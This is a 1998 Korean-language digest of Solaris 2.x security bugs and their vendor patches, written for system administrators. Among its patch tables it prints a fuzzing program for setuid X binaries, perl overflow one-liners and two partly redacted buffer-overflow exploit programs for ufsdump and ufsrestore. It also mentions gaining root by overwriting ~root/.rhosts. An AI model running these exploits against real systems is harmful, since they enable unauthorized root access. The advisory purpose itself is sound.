Solaris 2.x Bugs in 1998

머리말

이 문서는 Solaris 2.x (2.3 ~ 2.6) OS 중 심각한 security 상의 문제를 일으키는 버그들에 대해 상세히 설명했으며, 그 해결책을 제시하고 있다. SunOS 4.x , Solaris 2.0 , Solaris 2.1 , Solaris 2.2 에도 해당되는 버그도 있으나 이 부분에 대한 언급은 현재 대부분의 SUN 시스템이 Solaris 2.3 ~ Solaris 2.6 버전을 탑재하고 있음을 반영하여 설명을 생략하였다. 하지만 타 OS 에도 공통으로 존재하는 critical 한 버그의 경우에는 언급을 하였다. 이 문서에서 주로 참고로 삼은 문서는 Sun Security Bulletin 이며 bugtraq 등과 같은 곳에 해킹 스크립트, 프로그램과 함께 배포되는 토론내용, 버그에 대한 설명들도 설명에 반영하였다.

이 문서는 위의 참고 문헌들을 기반으로 삼고 있기 때문에 Solaris 2.x 상에 존재하는 모든 보안상의 버그를 다룬 것이 아님을 잊어서는 안된다. 끊임없이 SUN 에서 제공하는 패치들을 부지런히 적용하는 것이 중요하다고 생각한다.

별것 아닌 문서지만 이 문서가 국내 관리자들에게 도움이 되길 바란다.

Copyright

이 글에 대한 모든 권리는 글쓴이인 김휘강 (sakai@major.kaist.ac.kr) 에게 있으며, 글쓴이의 저작권을 "명시해주고" , 상업적인 목적에 사용하지 않는 한, 이 글의 일부 혹은 전부를 "변형 없이" 복사, 배포하는 것을 허용합니다.

Bugs of Solaris 2.x in 1998

List up and Considering about Solaris 2.x 's critical bugs in 1998

목적:

1998 년도에 핫 이슈로 떠오른 Solaris 2.x 의 버그들이 어떤 것이 있는지 파악하고 간단히 문제점이 발생한 원인을 분석한 뒤 패치 방법에 대해 알아본다.

1. volrmmount (1998/2/10) ; bug id #162

1. 해당 프로그램

volrmmount (1)

2. 해당 시스템

SunOS versions 5.6, 5.6_x86

3. Description of Bugs

volrmmount (1) 은 Solaris 2.6 에서부터 제공되기 시작한 커맨드이다.

이 명령어는 removable media 의 insert 와 eject 를 control 하는 커맨드인데 문제를 일으키는 대부분의 프로그램이 그러하듯, 이 프로그램 역시 setuid bit 가 붙어있고, root 소유의 program 이다.

예전의 vold , eject 의 커맨드들이 일으켰던 것과 유사한 방식의 문제이다.

이 프로그램을 이용해서 일반 사용자라면 누구라도 시스템 내의 어떠한 화일을 액세스 할 수가 있게 되고, 이로 인해 루트의 권한도 얻을 수 있게 된다.

4. 해결책 & 패치리스트

SunOS 5.6

ftp://sunsolve1.sun.com/pub/patches/105407-01.tar.Z

SunOS 5.6_x86

ftp://sunsolve1.sun.com/pub/patches/105408-01.tar.Z

5. References

2. vacation (1998/3/4) ; bug id #163

1. 해당 프로그램

vacation (1)

2. 해당 시스템

sendmail 8 이 설치된 AIX 4.1 , 4.2 버전

1997 년 8 월 28 일 이전 버전의 FreeBSD, NetBSD

1997 년 7 월 29 일 이전 버전의 OpenBSD

public domain 버전의 sendmail 이 설치된 대부분의 Solaris 버전

public domain 버전의 sendmail 이 설치된 Linux , HP-UX

3. Description of Bugs

vacation (1) 은 사용자가 현재 메일을 읽을 수 없는 경우 (이를테면 휴가), 신규 메시지에 대해 자동으로 답장을 해주는 프로그램이다.

$HOME/.forward 에 아래와 같은 항목을 삽입하여 vacation 프로그램을 사용하게 된다.

\user, "|/usr/bin/vacation user"

vacation 프로그램이 신규메시지에 응답할 때 sendmail 커맨드를 호출하게 되는데, 커맨드 라인에 sender 의 address 를 명시하게 된다.

이 때 커맨드 라인상에 sender 의 e-mail address 를 넘겨줄 때 e-mail address 를 조작해서 sendmail 의 configuration file 을 읽어들이는 옵션을 넘겨줄 수 있게 된다.

(예: -C/var/mail/user 로 지정을 하면 sendmail 이 /var/mail/user 를 configuration file 로 사용하게 된다.)

해킹에 사용될 configuration file 은 미리 email messages 나 anonymous ftp 를 이용하여 전송해 두는데 (위의 예에서는 /var/mail/user 의 mail spool file 을 sendmail 의 configuration 파일 처럼 사용하게 된다. ), sendmail 이 실행 될때 다른 해커가 지정한 커맨드를 실행시키도록 조작해둔다.

해킹에 성공하게 되면 sendmail 은 configuration file 에 명시된 임의의 커맨드를 실행시키게 된다.

참고 : 이 버그는 Liudvikas Bukys 에 의해 1994 년에 발견되었다.

4. 해결책 & 패치리스트

vacation 은 autoreply 와 마찬가지로 그다지 많이 사용되지 않는 프로그램이다.

OS vendor 에서 제공하는 패치를 하던가

# chmod 0 /usr/bin/vacation

과 같이 아예 disable 시켜도 좋을 것이다.

하지만 vacation 을 꼭 써야 하는 경우라면 임시로 버그가 fix 된 vacation 을 설치하도록 한다.

ftp://testcase.software.ibm.com/aix/fromibm/vacation.security.tar.Z

IBM AIX

AIX 4.1: IX70228

AIX 4.2: IX70233

HP-UX

아직 패치는 존재하지 않는다.

OpenBSD 2.1

1997/08/29 이전 버전의 OpenBSD 에 아직 버그가 존재한다.

FreeBSD

2.1-stable , 2.2-stable , 3.0-current (1997/08/28) 버전에서 문제가 해결되었다. 곧 나올 FreeBSD 2.2.5-RELEASE 와 3.0-RELEASE 버전에서도 이 문제점은 수정될 것이다.

NetBSD

19970828 이후버전으로 업그레이드 할 것을 권한다.

SunOS

이미 Patch 를 제공해 주고 있다.

OS version	Patch ID
SunOS 5.6	105518-01
SunOS 5.6_x86	105519-01
SunOS 5.5.1	105520-01
SunOS 5.5.1_x86	105521-01
SunOS 5.5	105533-01
SunOS 5.5_x86	105534-01
SunOS 5.4	102066-21
SunOS 5.4_x86	102064-19
SunOS 5.3	101782-02
SunOS 4.1.4	105466-01*
SunOS 4.1.3_U1	105465-01*

위의 패치들은 sendmail V8 에서만 작동되므로 sendmail V5 를 사용하는 경우 V8 로 업그레이드 하도록 한다.

Other

아래의 ftp site 에서 패치된 vacation 을 가져다가 설치하도록 한다.

ftp://ftp.secnet.com/pub/patches/vacation.tar.Z

위의 패치는 Eric Allman 과 Keith Bostic 에 의해 개발된 것인데, sendmail version 8 이외의 버전에서 "--" 옵션을 제대로 해석하도록 getopt() 를 애뮬레이트 하는지는 확인되지 않았으므로, 이 패치를 이전 버전의 sendmail 에 적용시키고자 하는 경우에는 sendmail command line 옵션이 " --" 일 경우 getopt() 를 사용하지 않은 경우 parsing 을 할 수 없게 되므로 vacation.c 내의 아래의 코드가

execl(_PATH_SENDMAIL, "sendmail", "-f", myname, from, NULL);

아래의 코드로 바뀌어야 한다.

execl(_PATH_SENDMAIL, "sendmail", "-f", myname, "--", from, NULL);

5. References

Sun Security Bulletin 163 번

3. dtaction (1998/3/4) ; bug id #164

1. 해당 프로그램

dtaction

2. 해당 시스템

CDE 를 사용하고 있는 SunOS versions 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86

3. Description of Bugs

dtaction 유틸리티는 application 이나 shell script 가 CDE (common desktop environment) 개발환경에서 action request 가 왔을 때 호출 될 수 있도록 해주는 프로그램이다. 보통 /usr/dt/bin/ 에 위치한다.

dtaction 프로그램의 argument 에 대한 boundary checking 을 안해주기 때문에 stack overflow 를 일으켜 내부 stack 공간을 overwrite 시키게 될 수 있는데 아래에서 보는 것처럼 dtaction 은 setuid root 프로그램이므로 , 이 프로그램을 이용해서 root 권한을 얻게 할 수 있다.

[major /usr/dt/bin 47 ] ls -asl dtaction

44 -r-sr-sr-x 1 root sys 22516 1996년 4월 13일 dtaction*

뒷부분에서 설명할 CDE 의 문제점 및 X Library 의 문제점에서도 이야기 하겠지만, dtaction 의 문제점은 근본적으로 CDE 와 X Library 의 문제점에 기인한다.

4. 해결책 & 패치리스트

CDE version	Patch ID
1.2	105669-02
1.2_x86	105670-02
1.02	105716-02
1.02_x86	105717-02
1.01	105714-02
1.01_x86	105715-02

4. CDE 의 문제점

dtaction 과 관련하여 CDE 전반에 걸친 문제점을 한번 살펴보기로 하자.

1. 해당 package

CDE (Common desktop Environment)

2. 해당 시스템

여기에 해당되는 OS 내에서 CDE 를 설치한 경우에만 해당된다.

AIX 4.1, 4.2, 4.3

Digital Equipment Corporation

HP9000 Series 700/800s HP-UX 10.10, HP-UX 10.20,

HP-UX 10.24 (VVOS), HP-UX 11.00

Solaris

3. Description of Bugs

dtappgather 프로그램은 사용자에 의해 넘어오는 정보를 적절히 점검하지 않는다. 이러한 문제점을 악용하여 시스템의 root 권한을 얻을 수 있을 뿐 아니라 Denial of Service Attack 도 할 수 있게 된다.

더 구체적으로 이야기 하면 Local 상의 사용자는 임의의 파일에 write 권한을 얻을 수 있게 되므로 이를 악용하여 root 권한을 얻는 것 역시 가능하게 된다. (예: ~root/.rhosts) 또한 임의의 디렉토리를 삭제할 수도 있게 되므로 시스템의 중요한 디렉토리를 삭제하여 서버를 서비스불능상태로 만들 수 있게 되는 것이다.

4. 해결책 & 패치리스트

Digital Equipment Corporation

현재 개발중에 있다. 패치사이트에서 곧 발표될 예정이다.

Hewlett-Packard Company

PHSS_13723 HP-UX 10.10

PHSS_13724 HP-UX 10.20

PHSS_13725 HP-UX 10.30

PHSS_13772 HP-UX 10.24

PHSS_13406 HP-UX 11.00

IBM Corporation

dtappgather 가 포함된 AIX 의 전버전에 문제점이 존재한다.

AIX 3.2: CDE 가 포함되지 않았었으므로 이 버그에 해당되지 않음

AIX 4.1: IX73436

AIX 4.2: IX73437

AIX 4.3: IX73438

Sun Microsystems, Inc.

CDE 1.2 105837-01

CDE 1.2_x86 105837-01

CDE 1.02 104498-02

CED 1.02_x86 104500-02

CED 1.01 104497-02

CED 1.01_x86 104499-02

5. X Library 의 문제점

1. 해당 package

X library

2. 해당 시스템

대부분의 UNIX system

3. Description of Bugs

아래의 내용들은 David Hedley 에 의해 지적된 문제점들이다.

대부분의 UNIX platform 의 X library 에서 resource manager routine 에 결함이 존재한다. 우선적으로 suid 가 걸려있는 프로그램들 중 X resource manager routine 을 사용하는 X library 에 연결되어 있는 것들은 그 프로그램 자체가 보안상 결함이 없다 할 지라도, buffer overflow 를 일으킬 소지가 있다.

이것을 테스트 해보자. 아래의 프로그램을 컴파일해서 여러 suid 가 걸려있는 X windows 프로그램들의 파라미터로 실행시켜보자. 만일 segmentation fault 나 bus error 가 발생한다면 잠재적으로 문제점이 존재한다고 볼 수 있다.

testx.c

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

#include <unistd.h>

void main(int argc, char **argv)

{

char *env[] = {0};

char buffer[18000]; /* Irix has a 20k limit for environment+args */

if (argc < 2)

exit(1);

memset(buffer,'a',sizeof buffer);

buffer[sizeof buffer-1] = '\0';

execle(argv[1], argv[1], "-xrm", buffer, 0, env);

perror("exec failed");

}

Irix

% ./testx /usr/bin/X11/xterm

zsh: bus error ./testx /usr/bin/X11/xterm

% ./testx /usr/bin/X11/cdplayer

zsh: bus error ./testx /usr/bin/X11/cdplayer

% ./testx /usr/bin/X11/xconsole

zsh: bus error ./testx /usr/bin/X11/xconsole

% ./testx /usr/bin/X11/xlock

Xlib: connection to ":0.0" refused by server

Xlib: Client is not authorized to connect to Server

xlock: unable to open display :0.

우선 위의 실행 예에서는 xlock 은 문제가 없는 것으로 나왔지만 아래의 예에서는 잠재적으로는 문제가 존재하는 것을 알 수 있다.

On solaris:

% ./testx /usr/dt/bin/dtprintinfo

zsh: bus error ./testx /usr/dt/bin/dtprintinfo

% ./testx /usr/dt/bin/dtaction

zsh: bus error ./testx /usr/dt/bin/dtaction

On XFree86 (tested on FreeBSD 2.2.2):

%./testx /usr/X11R6/bin/xlock

zsh: segmentation fault ./testx /usr/X11R6/bin/xlock

%./testx /usr/X11R6/bin/color_xterm

zsh: segmentation fault ./testx /usr/X11R6/bin/color_xterm

%./testx /usr/X11R6/bin/xterm

zsh: segmentation fault ./testx /usr/X11R6/bin/xterm

참고로 실험에 사용된 xlock 은 xlockmore-4.02 으로 최신버전이다.

Linux/Slackware-3.1:

% uname -a

Linux xwing 2.0.0 #5 Fri Feb 21 13:01:20 PST 1997 i486

% testx /usr/X11/bin/xload

Segmentation fault

% testx /usr/X11/bin/xlock

Segmentation fault

% testx /usr/X11/bin/xterm

Segmentation fault

RedHat:

$ cat /etc/redhat-release

release 4.1 (Vanderbilt)

$ uname -a

Linux turing.imm.net 2.0.30 #3 Sat Apr 26 22:55:36 MET DST 1997 i686

$ find /usr/X11R6 -perm +6000 -exec ls -l {} \;

-rws--x--x 1 root root 144868 Feb 13 03:49 /usr/X11R6/bin/xterm

-rws--x--x 1 root root 159472 Nov 20 1996 /usr/X11R6/bin/kterm

-rwsr-xr-x 1 root bin 710284 Feb 19 07:54 /usr/X11R6/bin/Xmetro

-r-sr-xr-x 1 root root 10464 Dec 19 01:01 /usr/X11R6/bin/XConsole

-rwsr-xr-x 1 root root 53464 Jan 31 23:16 /usr/X11R6/bin/rxvt

-rwxr-sr-x 1 root uucp 98364 Nov 21 1996 /usr/X11R6/bin/seyon

-rwxr-sr-x 1 root daemon 181436 Nov 20 1996 /usr/X11R6/bin/xbill

-rws--x--x 1 root root 136504 Nov 20 1996 /usr/X11R6/bin/nxterm

-rwsr-xr-x 1 root bin 477408 Aug 16 1996 /usr/X11R6/lib/X11/

AcceleratedX/arch/LINUX/Xaccel

$ ./testx /usr/X11R6/bin/xterm

Segmentation fault

$ ./testx /usr/X11R6/bin/kterm

^[[ASegmentation fault

$ ./testx /usr/X11R6/bin/XConsole

Segmentation fault

$ ./testx /usr/X11R6/bin/rxvt

rxvt: bad option "-xrm"

rxvt: bad option

"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa$

[spam]

Usage v2.19:

rxvt [-help]

[-display displayname] [-geometry geom] [-/+rv] [-bg color] [-fg color]

[-fn fontname] [-iconic] [-name string] [-title string] [-n string]

[-cr color] [-/+ls] [-/+sb] [-sl number] [-/+ut] [-/+vb] [-C]

[-e command arg ...]

$ ./testx /usr/X11R6/bin/seyon

>> Warning: Could not execute `seyon-emu.

>> Notice: Falling to `xterm'.

>> Error: Could not execute `xterm'.

>> Notice: Giving up.

$ ./testx /usr/X11R6/bin/xbill

Segmentation fault

$ ./testx /usr/X11R6/bin/nxterm

Segmentation fault

4. 해결책 & 패치리스트

AUSCERT 에서 개발한 buffer overflow wrapper 를 아래의 사이트에서 구하여 설치하도록 한다.

ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper/overflow_wrapper.c

http://cegt201.bradley.edu/~im14u2c/wrapper/

6. ndd (1998/3/11) ; bug id #165

1. 해당 프로그램

ndd (1M)

2. 해당 시스템

SunOS 5.6 , SunOS 5.6_x86.

3. Description of Bugs

ndd 를 사용하여 TCP/IP 커널 parameter 들을 세팅할 수 있는데 , ndd 를 악용하여 해커들이 임의로 parameter 들을 세팅할 수 있게 되어 denial of service 공격을 할 수 있게 된다.

해결책 & 패치리스트

OS Version	Patch ID
SunOS 5.6	105786-01
SunOS 5.6_x86	105787-01

5. References

Sun Security Bulletin 165 번

7. rpc.cmsd (1998/3/11) ; bug id #166

1. 해당 프로그램

rpc.cmsd

2. 해당 시스템

Openwindows 를 사용하고 있는 SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3, 4.1.4, 4.1.3_U1

CDE 를 사용하고 있는 SunOS 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86

3. Description of Bugs

rpc.cmsd 은 일정관리나 데이터의 resource-scheduling 에 쓰이는 작은 database manager 이다. client 로는 Openwindows 의 calendar manager 나 CDE 의 calendar 가 있다.

이 프로그램에 존재하는 문제점을 이용해서 임의의 파일에 어떤 내용이라도 overwrite 시킬 수 있게 되어 root 권한을 얻을 수 있게 된다.

4. 해결책 & 패치리스트

OpenWindows

SunOS	Patch ID
SunOS 5.5.1		104976-03
SunOS 5.5.1_x86		105124-02
SunOS 5.5		103251-07
SunOS 5.5_x86		103273-04
SunOS 5.4		102030-09
SunOS 5.4_x86		102031-07
SunOS 5.3		101513-12
SunOS 4.1.4		100523-24
SunOS 4.1.3_U1		100523-24

CDE

CDE version	Patch ID
1.02	103670-04
1.02_x86	103717-04
1.01	103671-04
1.01_x86	103718-04

References

Sun Security Bulletin 166 번

8. rpcbind (1998/4/8) ; bug id #167

1. 해당 프로그램

rpcbind

2. 해당 시스템

SunOS versions 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3.

3. Description of Bugs

rpcbind 프로그램은 RPC 프로그램 number 를 universal address 로 전환해 주는 서버프로그램이다. RPC 서비스가 시작되면 rpcbind 를 통해 RPC 서비스가 listening 하고 있는 주소와 서비스할 준비가 된 RPC 프로그램 number 를 전달한다.

이 rpcbind 에 문제점이 발견되었는데 이를 악용하여 누구나 임의의 파일에 overwrite 할 수 있게 되어 시스템 접근권한을 가지게 된다.

또한 Nicolas Dubee 에 의하면 rpcbind 가 SIGTERM 이나 SIGINT 시그널을 받아 종료되는 경우, 현재 register된 서비스의 리스트를 /tmp/portmap.file 과 /tmp/rpcbind.file 에 심볼릭 링크나 다른 사항들에 대한 아무런 checking 없이 기록하게 된다. 이를 악용하여 file system 내의 임의의 파일에 기록하도록 조작할 수 있다고 한다. (예: .rhosts)

rpcbind 가 시작할 때 -d 옵션을 주어 debug 모드로 작동하게 하고 응답불가능한 Procedure call 을 보낸다. (즉, client 가 response 가 보내지기 전에 connection 을 close 한 경우), 그렇게 되면 rpcbind_abort() 를 프로세스가 kill 되기 전에 호출하게 되는데 rpcbind_abort() 는 write_warmstart() 을 호출하게 된다. write_warmstart() 는 warmstart 정보를 /tmp/rpcbind.file 과 /tmp/portmap.file 에 기록하게 된다. 단, 이것은 debug mode 로 rpcbind 가 시작했을 경우에만 이다.

4. 해결책 & 패치리스트

OS version	Patch ID
SunOS 5.6	105216-03
SunOS 5.6_x86	105217-03
SunOS 5.5.1	104331-07
SunOS 5.1_x86	104332-07
SunOS 5.5	104357-05
SunOS 5.5_x86	104358-05
SunOS 5.4	102070-06
SunOS 5.4_x86	102071-06
SunOS 5.3	102034-05

아래의 사이트에서 Wietse's RPCBIND 2.1 버전을 구하여 설치한다.

ftp://ftp.win.tue.nl/pub/security

위의 프로그램에는 O_EXCL option 이 포함되어 있다.

5. References

Sun Security Bulletin 167 번

9. mountd (1998/4/29) ; bug id #168

1. 해당 프로그램

rpc.mountd

2. 해당 시스템

SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86, 5.3

3. Description of Bugs

mountd 은 NFS file system mount request 을 처리하는 RPC server 이다.

이 프로그램의 버그를 이용하여 NFS 서버상에 존재하는 파일들( 그 파일들이 NFS 에 export 된 file system 이 아닐지라도 ) 에 대한 정보를 얻어낼 수 있게 된다.

4. 해결책 & 패치리스트

SunOS	Patch ID
SunOS 5.6	105615-03
SunOS 5.6_x86	105616-03
SunOS 5.5.1	104220-03
SunOS 5.5.1_x86	104221-03
SunOS 5.5	104223-02
SunOS 5.5_x86	104224-02
SunOS 5.4	102685-02
SunOS 5.4_x86	102686-02
SunOS 5.3	102654-02

5. References

Sun Security Bulletin 168 번

10. ufsrestore (1998/4/29) ; bug id #169

1. 해당 프로그램

/usr/lib/fs/ufs/ufsdump

/usr/lib/fs/ufs/ufsrestore

2. 해당 시스템

SunOS 5.5, 5.5.1

3. Description of Bugs

ufsrestore 유틸리티는 백업 미디어에서 ufsdump 커맨드를 사용하여 생성된 파일들을 restore 하는데 사용된다. 이 ufsrestore 의 버그를 사용하여 local user 라면 누구나 root 의 권한을 얻을 수 있게 된다.

(by Seth McGann)

/usr/lib/fs/ufs/ufsdump 에 충분히 긴 디바이스 이름을 넘겨주게 되면 segmentation fault 를 일으키게 된다. 여기에서 overflow 를 일으켜 shellcode 가 /bin/id 를 실행시키게 되면 egid=tty 임을 알 수 있다.

즉, root 가 되지는 못했더라도 tty 의 권한을 얻을 수 있게 된다.

/usr/lib/fs/ufs/ufsrestore 역시 충분히 긴 디바이스 이름을 넘겨주게 되면 segmentation fault 를 일으키게 된다. 이때 gdb 를 이용해서 관찰을 해보면 , 한번 EIP 가 overwrite 되면 execution 은 0x0 로 jump 하게 된다.

이 결함을 아래와 같이 테스트 해본다.

/usr/lib/fs/ufs/ufsdump 1 `perl -e 'print "a" x 2000'`

/usr/lib/fs/ufs/ufsrestore xf `perl -e 'print "a" x 2000'`

참고로 ufsdump 를 해킹하는 프로그램은 아래와 같다. 부작용을 방지하는 차원에서 일부를 삭제했다.

/* ufsdump.c

* Description: Overflows a buffer to give you EGID=tty.

* At least that's what id reports.

* The running shell thinks its still the user. Maybe I'm

* doing something wrong? At any

* rate, here ya go, have fun.

* smm@wpi.edu

* Thanks to: Jesse Schachter for the box, and

* Unknown parties for the shellcode. (probably Aleph1).

#include <stdio.h>

static inline getesp() {

__asm__(" movl %esp,%eax ");

}

main(int argc, char **argv) {

int i,j,buffer,offset;

long unsigned esp;

char unsigned buf[4096];

unsigned char

shellcode[]=

………

buffer=895;

offset=3500;

if (argc>1)buffer=atoi(argv[1]);

if (argc>2)offset=atoi(argv[2]);

for (i=0;i<buffer;i++)

buf[i]=0x41; /* inc ecx */

j=0;

for (i=buffer;i<buffer+strlen(shellcode);i++)

buf[i]=shellcode[j++];

esp=getesp()+offset;

buf[i]=esp & 0xFF;

buf[i+1]=(esp >> 8) & 0xFF;

buf[i+2]=(esp >> 16) & 0xFF;

buf[i+3]=(esp >> 24) & 0xFF;

buf[i+4]=esp & 0xFF;

buf[i+5]=(esp >> 8) & 0xFF;

buf[i+6]=(esp >> 16) & 0xFF;

buf[i+7]=(esp >> 24) & 0xFF;

printf("Offset: 0x%x\n\n",esp);

execl("/usr/lib/fs/ufs/ufsdump","ufsdump","1",buf,NULL);

}

ufsrestore 를 해킹하는 프로그램은 아래와 같다. 역시 부작용을 방지하는 차원에서 코드의 일부를 삭제했다.

// ufsrestore solaris 2.4, 2.5, 2.5.1, 2.6 exploit

// by humble

// thanks to plaguez for help

#include <stdio.h>

#include <stdlib.h>

#include <sys/types.h>

#include <unistd.h>

#define BUF_LENGTH 300

#define EXTRA 100

#define STACK_OFFSET -600

#define SPARC_NOP 0xac15a16e

// normal shell code cept I added a bunch of sll's and add's

// to get rid of a 2f '/' in there (from the sethi 0xbdcda, %l7)

// I don't know sparc assembly so this might be dumb :P

// also added code to do seteuid(0); setuid(0); from erik's buffer

// overrun page

………………

u_long get_sp(void)

{

__asm__("mov %sp,%i0 \n");

}

void main(int argc, char *argv[])

{

char buf[BUF_LENGTH + EXTRA + 8];

long targ_addr;

u_long *long_p;

u_char *char_p;

int i, code_length = strlen(sparc_shellcode),dso=0,a=0;

if(argc > 1) dso=atoi(argv[1]);

long_p =(u_long *) buf ;

targ_addr = get_sp() - STACK_OFFSET - dso;

for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)

*long_p++ = SPARC_NOP;

char_p = (u_char *) long_p;

for (i = 0; i < code_length; i++)

*char_p++ = sparc_shellcode[i];

long_p = (u_long *) char_p;

for (i = 0; i < EXTRA / sizeof(u_long); i++)

*long_p++ =targ_addr;

printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",

targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);

printf("hit ctrl-c and then type y\n");

execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0);

perror("execl failed");

}

4. 해결책 & 패치리스트

105722-01 과 105724-01 는 아직 패치가 불완전하므로 아래와 같이 임시패치를 하도록 한다.

chmod ug-s /usr/lib/fs/ufs/ufsdump

chmod u-s /usr/lib/fs/ufs/ufsrestore

OS vendor 에서 제공하는 패치는 아래와 같다.

SunOS	Patch ID
SunOS 5.5.1	104490-05
SunOS 5.5.1_x86	104491-04
SunOS 5.5	103261-06
SunOS 5.5_x86	103262-06

5. References

11. rpc.nisd (1998/6/10) ; bug id #170

1. 해당 프로그램

rpc.nisd.

2. 해당 시스템

NIS+ 서비스를 하고 있는 SunOS 5.6, 5.6_x86, 5.5.1, 5.5.1_x86, 5.5, 5.5_x86, 5.4, 5.4_x86 ,5.3

HP-UX

NEC

3. Description of Bugs

NIS+ 와 NIS 는 분산된 환경에서의 사용자, 머쉰, 기타 network resource 를 중앙에 집중시켜 관리함에 편리함을 제공하려고 개발되었다.

buffer overflow 를 일으킬 수 있는 문제점이 NIS+ 내에 존재한다.

일반적으로 RPC 데몬으로 보내진 데이터는 buffer overflow 를 일으키지 않기 위해 명시된 maximum length 를 갖는다. 하지만 nis_name 이란 NIS+ argument 는 maximum length 를 정해두지 않았기 때문에 max length 는 unsafe 한 값이 된다.

NIS+ 는 이 argument 를 고정된 길이의 스택내부 버퍼에 복사하기 때문에 해커는 스택을 overflow 시켜서 데몬으로 하여금 임의의 machine code 를 실행시키도록 할 수 있다. 이 문제점은 ISS 의 Josh Daymont 에 의해 발견되었다.

게다가 만일 NIS+ 서버가 NIS 호환 모드로 작동하고 있고, 침입자가 NIS+ 서버를 변조할 수 있다면 침입자는 NIS 서버인 것처럼 위장할 수 있게되고 이를 이용해서 NIS 를 사용하고 있는 머쉰들에 접근 권한을 갖게 된다.

또한 침입자가 NIS+ 서버를 망가뜨릴 수 있게 되면 NIS+ client 측에 잘못된 initialization 정보를 줄 수 있게 된다.

Solaris 머쉰에서 현재 자신의 호스트가 nisd 결함이 존재하는지를 살펴보고 싶으면 rpc.nisd 가 떠 있는지 확인해 본다.

solaris% rpcinfo -p localhost | grep 100300

현재 대부분의 Solaris 버전에서 버그가 존재하므로 아래와 같은 결과가 나온다면 패치를 해야 한다.

100300 3 udp 32773 nisd

100300 3 tcp 32771 nisd

rpc.nisd 데몬은 nis+ 서비스를 위해 구현된 RPC 서비스인데, 이 때 NIS+ namespace 에 해당되는 모든 머신에서 구동되고 있어야 한다.

이 rpc.nisd 를 이용하여 buffer overflow 를 일으켜 임의의 커맨드를 실행시켜 root 권한을 얻어낼 수 있게 되는 것이다.

우선 NIS+ 에 대해 좀더 자세히 알아보기로 하자.

NIS+ 는 name resolution 과 인증 (authentication) 의 방법으로 resource location 및 관리를 하게 해주는 일종의 Network 디렉토리 서비스이다. YP 로 잘 알려진 NIS 의 차기버전이라고 할 수 있다.

NIS+ 은 ONC RPC mechanism 을 이용해서 NIS+ client 들이 서버에게 RPC 를 이용하여 interaction 을 할 수 있도록 해준다.

NIS+ 에 의해 제공되는 서비스들은 security-critical 하기 때문에 NIS+ 은 secure 하게 작동하도록 디자인 되었다. 이러한 디자인을 잘 반영해 주는 것이 "security levels" 이란 개념이다.

Security levels 는 RPC NIS 의 request 에 대해 얼마나 정밀하게 검증할 것인지에 대한 정도를 정해놓은 기준이다.

NIS+ 에는 0~2 의 3 가지 security 레벨이 있다.

Level 0 에서는 NIS+ server (rpc.nisd) 에서 들어온 request 가 적법한지 (legitimacy) 아무런 인증도 하지 않는다. 이 옵션은 디버깅 목적으로 제공된다.

Level 1 에서는 RPC AUTH_UNIX (client-presented UIDs and GIDs) 가 인증방법으로 사용된다.

가장 secure 한 Level 인 Level 2 에서는 들어오는 request 를 인증하기 위해 AUTH_DES 를 사용한다. 하지만 , 시스템이 security level 2 를 운영하고 있을 때 , 즉 모든 request 에 대해 암호화된 인증을 거쳐야 하지만 rpc.nisd 데몬은 몇몇 인증되지 않은 RPC call 을 한다. 이 call 들이 원격 clinet 에서 NIS+ 서버에 대한 중요한 정보를 얻어낼 수 있도록 하는 것이다.

그 뿐이 아니고, 원격의 침입자가 NIS+ 서버가 NIS+ cache 를 이용해서 logging 하는 것을 disable 시킬 수도 있게 된다. 이 문제점은 NIS+ 데몬인 rpc.nisd 의 버그 때문에 발생하게 된다.

문제가 되는 이 3 가지 RPC call 들은 다음과 같다.

NIS_CALLBACK

NIS_CALLBACK RPC 를 사용하여 임의의 client 들은 주어진 PID 의 유효성을 결정할 수 있게 된다. 또는 multiple queries 를 사용하여 모든 유효한 process ID 들을 정밀하게 검증한다.

2. NIS_STATUS

NIS_STATUS RPC 를 사용하여 client 들은 아래의 항목과 같은 NIS+ 서버의 설정에 대한 정보를 얻을 수 있다.

서버의 security level

서버가 NIS/YP 호환모드로 작동하고 있는지 여부

서버가 root NIS+ server 인지 여부

자체적으로 DNS resolver 를 사용하고 있는가 또는DNS 요청을 forwarding 하고 있는가에 대한 여부

서버에서 제공되는 모든 디렉토리 객체의 리스트

3. NIS_SERVSTATE

이 RPC 에 TAG_DEBUG 옵션을 사용하여 어떠한 외부 사용자라도 모든 rpc.nisd logging 을 중단시킬 수 있다. TAG_*CACHE (D, T, G) 옵션을 사용하여 directory, table, group cache 들을 flush 시킬 수 있다.

4. 해결책 & 패치리스트

패치를 수행하기 전까지 NIS+ 를 사용하지 않을 것을 권한다. 하지만 반드시 NIS+ 를 사용해야 하는 경우 패치를 꼭 하도록 하고 패치를 하지 못한 경우에는 다음과 같은 방법을 써서 임시로 대비할 수 있다.

firewall 이나 router 를 이용하여 port 111 번으로의 액세스를 block 하는 방법을 사용하여 portmapper 로의 외부 액세스를 제한한다.

시스템의 stack 을 실행불가능하게 설정해 놓는다. 예를 들어 sun4m, sun4d, sun4u 와 같은 platform 에서 Solaris 를 돌리는 경우 /etc/system 화일에 noexec_user_stack 변수를 setting 해서 디폴트로는 stack 을 실행불가능하도록 마킹해 둔다.

NIS+ clinet 에 인증되지 않은 network information 에 의존하지 않도록 한다. 예로써, Solaris 시스템 에서 /var/nis/NIS_COLD_START 파일을 이미 존재하는 NIS+ client 로부터 카피해온다. 그리고 이 파일을 nisinit 커맨드의 input 으로 사용한다.

HP-UX

패치를 개발중에 있다.

NEC system

아래의 사이트에서 패치를 구하도록 한다.

ftp://ftp.meshnet.or.jp/pub/48pub/security

SunOS

SunOS	Patch ID
SunOS 5.6	105401-13
